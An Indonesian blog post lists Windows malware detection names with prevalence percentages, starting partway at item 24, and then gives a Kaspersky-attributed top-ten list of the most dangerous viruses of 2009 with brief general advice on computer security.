24.Trojan-GameThief.Win32.Magania.bfrp (0.5225%)
25.Trojan-Downloader.Win32.Small.jvl (0.5225%)
26.Net-Worm.Win32.Koobface.d (0.4528%)
27.Trojan-Downloader.Win32.Injecter.cqd (0.418%)
28.HEUR:Trojan-Downloader.Win32.Generic (0.3831%)
29.Virus.Win32.Sality.aa (0.3135%)
30.not-a-virus:AdWare.Win32.Relevant.n (0.3135%)
31.Trojan-GameThief.Win32.Magania.bfdq ( 0.2786%)
32.not-a-virus:AdWare.Win32.Agent.lmz (0.2786%)
33.not-a-virus:AdWare.Win32.Shopper.l (0.209%)
34.Trojan-GameThief.Win32.Magania.bful (0.209%)
35.Trojan-GameThief.Win32.WOW.bie (0.209%)
36.not-a-virus:WebToolbar.Win32.FenomenGame.pxu (0.1742%)
37.Trojan-Dropper.Win32.Small.dhn (0.1742%)
38.Exploit.Win32.DCom.ad
39.Trojan-GameThief.Win32.Magania.bffe (0.1742%)
40.Trojan-GameThief.Win32.Magania.bfws (0.1742%)
41.Trojan-Banker.Win32.Banker.aifb (0.1742%)
42.Packed.Win32.Black.d (0.1742%)
43.Trojan.Win32.Agent.cgof (0.1393%)
44.Trojan-Dropper.Win32.Small.ayg (0.1393%)
45.Trojan-Downloader.Win32.FraudLoad.wcby (0.1393%)
46.Trojan-Downloader.Win32.Small.jwq ( 0.1393%)
47.Trojan-GameThief.Win32.OnLineGames.bktw ( 0.1393%)
48.MultiPacked.Multi.Generic (0.1393%)
49.HEUR:Backdoor.Win32.Generic (0.1045%
50.Suspicious.Win32.Packer (0.1045%)
51.Virus.Win32.Virut.ce (0.1045%)
52.Backdoor.Win32.IEbooot.dfe (0.1045%)
53.Trojan-Downloader.Win32.FraudLoad.erj ( 0.1045%)
54.Trojan-Dropper.Win32.Agent.atvx (0.1045%)
55.Backdoor.Win32.Agent.ahwn (0.1045%)
56.Multi.Win32.Packed (0.1045%)
57.HEUR:Trojan.Win32.Invader (0.1045%)
58.Trojan.Win32.Agent.abud (0.1045%)
59.Backdoor.Win32.Poison.ahgc (0.1045%)
60.Trojan-GameThief.Win32.Magania.bfsy (0.1045%)
61.Trojan-Downloader.Win32.Agent.cdid ( 0.1045%)
62.Trojan.Win32.Stuh.pdm (0.1045%)
63.Trojan.Win32.Buzus.bigq (0.1045%)
64.Backdoor.Win32.Small.icr (0.1045%)
65.Backdoor.Win32.Agent.ahgv (0.1045%)
66.Trojan.Win32.Agent.cngn (0.1045%)
67.Backdoor.Win32.Hupigon.aovn (0.1045%)
68.Trojan-Dropper.Win32.Agent.atmg ( 0.1045%)
69.Packed.Win32.Black.a (0.1045%)
70.HackTool.MSIL.KKFinder.q (0.0697%)
71.Trojan-Downloader.Win32.Small.aliy (0.0697%)
72.not-a-virus:AdWare.Win32.Webdir.e (0.0697%)
73.Email-Worm.Win32.Joleee.bwu (0.0697%)
74.HEUR:Virus.Win32.Generic (0.0697%)
75.Trojan-Dropper.Win32.Small.cdw (0.0697%)
76.Trojan.Win32.Agent.cccr (0.0697%)
77.Trojan.Win32.Midgare.mqa (0.0697%)
78.Backdoor.Win32.Bifrose.aknz (0.0697%)
79.Trojan.Win32.Agent.cmud (0.0697%)
80.not-a-virus:AdWare.Win32.Shopper.v (0.0697%)
81.Backdoor.Win32.Bifrose.fpb (0.0697%)
82.Trojan-Mailfinder.Win32.Mailbot.ec
83.Trojan.Win32.Agent.cjxh (0.0697%)
84.Trojan-Spy.Win32.Zbot.xdj (0.0697%)
85.P2P-Worm.Win32.Archivarius.b (0.0697%)
86.Virus.Win32.Sality.z (0.0697%)
87.HEUR:Worm.Win32.Generic (0.0697%)
88.Trojan-Dropper.Win32.Mudrop.ask (0.0697%)
89.Trojan.Win32.Agent2.hxw (0.0697%)
90.Trojan.Win32.Agent.cmnr (0.0697%)
91.Trojan.Win32.Agent.rzw (0.0697%)
92.Trojan-Downloader.Win32.FraudLoad.eki (0.0697%)
93.Trojan-Downloader.JS.Agent.gj (0.0697%)
94.not-a-virus:AdWare.Win32.AlexaBar.n (0.0697%)
95.Trojan.Win32.KillWin.pi (0.0697%)
96.not-a-virus:AdWare.Win32.Chiem.c (0.0697%)
97.Net-Worm.Win32.Kido.cy
98.Trojan-Downloader.Win32.Agent.cgaw(0.0348%)
99.Trojan-Dropper.Win32.Mudrop.aso (0.0348%)
100.Packed.Win32.Krap.c (0.0348%)
10 Virus terganas 2009
Virus memang menyebalkan. Jika anda pengguna windows, sebagian besar dari anda pasti pernah kena virus. Taukah virus terganas? Ini adalah daftar 10 virus terganas 2009 versi kaspersky.
1. Virus.Win32.Sality.aa
2. Worm.Win32.Mabezat.b
3. Net-Worm.Win32.Nimda
4. Virus.Win32.Xorer.du
5. Virus.Win32.Alman.b
6. Virus.Win32.Sality.z
7. Virus.Win32.Parite.b
8. Virus.Win32.Virut.q
9. Trojan-Downloader.HTML.Agent.m
10. Virus.Win32.Virut.n
Kalau ingin deskripsi lebih jelas, silahkan anda buka http://www.viruslist.com
lalu silahkan cari yang berkaitan dengan itu.
anda sebagai pengguna komputer yang baik, pasti lebih tahu akan bahaya dan betapa resikonya kalo kita maen-maen dengan yang namanya itu virus. apapun antivirus yang kita gunakan, akan tergantung dari sistem yang anda inginkan ada di dalam komputer anda. semakin baik sistem yang anda inginkan, maka harus semakin baik pula sistem keamanan komputer yang harus anda gunakan.
sumber :http://infokomputer.mediaqu.com/archives/10

  • Free Blog Content

    ShoutMix chat widget